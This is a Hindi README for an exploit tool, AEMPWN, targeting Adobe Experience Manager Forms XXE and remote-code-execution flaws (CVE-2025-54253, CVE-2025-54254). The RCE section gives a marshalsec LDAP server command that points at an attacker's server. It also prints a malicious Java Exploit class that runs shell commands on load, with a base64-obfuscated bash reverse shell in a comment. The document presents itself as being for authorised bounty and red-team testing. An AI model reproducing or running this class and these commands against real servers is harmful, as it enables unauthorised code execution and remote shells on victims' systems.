
CVE-2025-54253 | CVE-2025-54254 | Adobe Experience Manager Forms XXE → RCE फ्रेमवर्क
CVE-2025-54253 और CVE-2025-54254 के लिए AEM Forms स्कैनर
AEMPWN उच्च-जोखिम वाली Adobe Experience Manager (AEM) Forms कमजोरियों की पहचान करने के लिए एक लक्षित स्कैनर है, जिसमें सुरक्षित पहचान, ब्लाइंड आउट-ऑफ-बैंड (OOB) पुष्टि, और पूर्ण प्रूफ-ऑफ-कॉन्सेप्ट (PoC) सत्यापन कार्यप्रवाहों का समर्थन शामिल है। यह टूल केवल अधिकृत सुरक्षा परीक्षण के लिए डिज़ाइन किया गया है।
समर्थित कमजोरियाँ
CVE-2025-54253 AEM Forms (JEE) में कॉन्फ़िगरेशन-निर्भर रिमोट कोड निष्पादन
CVE-2025-54254 XML एक्सटर्नल एंटिटी (XXE) इंजेक्शन जो फ़ाइल प्रकटीकरण और संभावित एस्केलेशन की ओर ले जाता है
संचालन के तरीके AEMPWN वास्तविक दुनिया के बाउंटी और रेड टीम कार्यप्रवाहों के अनुरूप तीन निष्पादन मोड का समर्थन करता है।
उद्देश्य: विनाशकारी व्यवहार को ट्रिगर किए बिना असुरक्षित XML पार्सिंग व्यवहार और व्यवहार्य शोषण सतह की पहचान करें।
यह क्या सत्यापित करता है: XML रिफ्लेक्शन गैर-HTML संरचित प्रतिक्रियाएँ कैनरी टोकन रिफ्लेक्शन असुरक्षित XML हैंडलिंग के संकेतक
कब उपयोग करें: आप कम-शोर सत्यापन चाहते हैं आप अभी भी प्रभाव का मानचित्रण कर रहे हैं एस्केलेशन से पहले आपको एक सुरक्षित संकेत चाहिए यह मोड प्रारंभिक ट्राइएज और आंतरिक रिपोर्टिंग के लिए उपयुक्त है।
उद्देश्य: AEM सर्वर से आउटबाउंड अनुरोधों के माध्यम से ब्लाइंड XXE की पुष्टि करें।
महत्वपूर्ण स्पष्टीकरण: Burp Collaborator (या समान सेवाएँ) केवल आउटबाउंड कनेक्शनों का अवलोकन करती हैं। वे निम्न नहीं करतीं: मनमाने DTD फ़ाइलों की मेज़बानी दुर्भावनापूर्ण पेलोड परोसना हमलावर-नियंत्रित प्रतिक्रियाएँ लौटाना LDAP/JNDI शोषण का समर्थन
इस वजह से, पूर्ण OOB XXE शोषण के लिए Collaborator अकेले अपर्याप्त है।
आपको क्या चाहिए: एक HTTP सर्वर जिसे आप नियंत्रित करते हैं (VPS, क्लाउड इंस्टेंस, टनलिंग के साथ स्थानीय सर्वर, आदि) DTD फ़ाइल परोसने की क्षमता इनबाउंड HTTP अनुरोधों और क्वेरी पैरामीटरों का अवलोकन करने की क्षमता
यह क्या सिद्ध करता है: XML पार्सर बाहरी एंटिटीज़ प्राप्त करता है लक्ष्य आउटबाउंड नेटवर्क अनुरोध करता है संवेदनशील स्थानीय फ़ाइलें पढ़ी और एक्सफ़िल्ट्रेट की जा सकती हैं
उद्देश्य: P1-स्तरीय प्रभाव के लिए AEM सर्वर पर वास्तविक कोड निष्पादन प्रदर्शित करें।
यह मोड XML पार्सिंग के माध्यम से JNDI इंजेक्शन पर निर्भर करता है, जिसके लिए HTTP कॉलबैक से परे इंफ्रास्ट्रक्चर की आवश्यकता होती है।
आपको क्या चाहिए: एक चालू LDAP सर्वर जो Java क्लास संदर्भ परोसने में सक्षम हो एक HTTP सर्वर जो संकलित Java क्लास होस्ट करता हो एक नियंत्रित निष्पादन प्रिमिटिव (जैसे, फ़ाइल निर्माण, आउटबाउंड कॉलबैक)
LDAP की आवश्यकता क्यों है: XML पार्सर JNDI संदर्भ को हल करने का प्रयास करता है यह AEM सर्वर को आपके LDAP लिसनर से कनेक्ट करने का कारण बनता है LDAP प्रतिक्रिया एक Java क्लास की ओर इशारा करती है क्लास JVM द्वारा लोड और निष्पादित की जाती है
सर्वोत्तम टूल: marshalsec
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://your-server/#Exploit" 1389
http://your-server/#Exploit = HTTP सर्वर जो Exploit.class (संकलित दुर्भावनापूर्ण क्लास) परोस रहा है।
दुर्भावनापूर्ण क्लास उदाहरण (सरल touch /tmp/pwned या रिवर्स शेल):
Javaimport java.io.IOException;
public class Exploit {
static {
try {
Runtime.getRuntime().exec("touch /tmp/pwned");
// or reverse shell: Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}");
} catch (IOException e) {}
}
}
कंपाइल करें → HTTP सर्वर पर होस्ट करें (DTD के साथ या अलग)। जब AEM एंटिटी को पार्स करता है → आपके LDAP से कनेक्ट होता है → क्लास प्राप्त करता है → कोड निष्पादित करता है।
मुख्य सीमा:
Burp Collaborator निम्न नहीं कर सकता: LDAP प्रतिक्रियाएँ परोसना Java क्लासेज़ होस्ट करना JNDI-आधारित क्लास लोडिंग ट्रिगर करना इस कारण, RCE मोड वास्तविक LDAP सेवा के बिना काम नहीं कर सकता।
Burp Collaborator के बारे में Burp Collaborator (और समान प्लेटफ़ॉर्म) केवल पहचान के लिए उपयोगी हैं।
वे पुष्टि कर सकते हैं: DNS लुकअप HTTP या HTTPS कॉलबैक ब्लाइंड आउटबाउंड कनेक्टिविटी
वे निम्न नहीं कर सकते: DTD फ़ाइलें होस्ट करना एक्सफ़िल्ट्रेट की गई फ़ाइल सामग्री संसाधित करना Java क्लासेज़ परोसना JNDI या LDAP-आधारित शोषण का समर्थन करना
Collaborator का उपयोग अवलोकन के लिए करें, पेलोड वितरित करने के लिए नहीं।
आउटपुट:
पुष्टि किए गए निष्कर्ष एक आउटपुट फ़ाइल में लिखे जाते हैं (डिफ़ॉल्ट: aem-forms-scan.txt) और इनमें शामिल होते हैं: लक्ष्य आधार URL प्रभावित एंडपॉइंट देखे गए पहचान संकेत मोड-विशिष्ट संकेतक वीडियो-PoC अनुकूल